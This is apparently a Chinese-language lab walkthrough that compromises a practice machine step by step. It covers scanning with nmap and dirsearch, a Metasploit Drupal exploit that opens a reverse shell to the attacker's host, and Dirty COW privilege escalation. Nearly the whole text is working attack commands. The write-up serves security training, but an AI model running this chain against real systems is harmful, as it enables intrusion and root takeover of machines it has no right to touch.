目录
信息收集
主机发现
arp-scan -l
端口扫描
nmap -p- 192.168.164.167
网页查看
访问http://192.168.164.167:1898/
最下方发现
目录扫描
dirsearch -u "http://192.168.164.167:1898/"
漏洞利用
msfconsole
search drupal
use 1
set rhosts 192.168.164.167
set rport 1898
set lhost 192.168.164.134
set lport 4444
run
提权
searchsploit dirty
上传漏洞源码
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
获取交互式shell
python -c "import pty; pty.spawn('/bin/bash')"
编译
g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
运行
./dcow -s
提权成功